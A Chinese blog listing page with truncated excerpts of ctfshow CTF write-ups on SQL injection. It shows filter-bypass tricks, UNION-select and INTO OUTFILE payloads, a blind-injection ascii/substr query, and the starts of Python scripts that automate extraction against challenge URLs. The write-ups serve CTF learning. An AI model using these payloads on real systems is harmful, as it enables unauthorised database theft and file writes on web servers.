sinat_31884905的博客

1.大小过滤 176union Unionselect Select2.空格 177/**/ 万万没想到，竟然是空格过滤有了问题，__ 这个也是空格的意思！！3.注释不对！！空格也被替换了注释不要用–+ – -用%23空格用%0a%0b%0c%0d%09unionselect __/**/--+-- -%0a%0b%0c%0d%09 ...

[x00-x7f] 匹配ASCII值从0-127的字符0-127表示单字节字符，也就是：数字，英文字符，半角符号，以及某些控制字符。限制了页面不能显示任何数据，?id=1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'--+&page=1&limit=10就跳到这里了，真的很神奇，所以说select xxx from xxx into outfile '/var/

思路分析//拼接sql语句查找指定ID用户$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";题目给出的提示，表格给出来了就是ctfshow_user4，username就是flag这里按理想到的回应是1' union select 1,2，password from ctfshow_user4 where usernam

web171——常规操作~2' and 1=1 # 2' and 1=2 #数据接口请求异常：parsererror2' and 1=1 --+回显正常，且爆出所有信息，说明“--+”其效果了 。“#”这种注释方式不成功2' union select 1,2,3 -- -成功回显1，2，3 2' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=dat

1.爆破?id=-1/**/or/**/ascii(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name="flag"/**/limit/**/0,1),1,1))=102

```php# -*- coding: utf-8 -*-"""Created on Fri May 21 11:23:55 2021@author: Administrator"""import requestss=requests.session()url="http://7341d132-e805-412d-8c9e-3402d7c1e803.challenge.ctf.show:8080/index.php?id=-1'/**/"table=""for i in ran.

# -*- coding: utf-8 -*-"""Created on Fri May 21 10:51:40 2021@author: Administrator"""import requestss=requests.session()url='http://1774ea69-f82e-4a6b-825c-3e0becd685ab.challenge.ctf.show:8080/index.php'table=""for i in range(1,45): print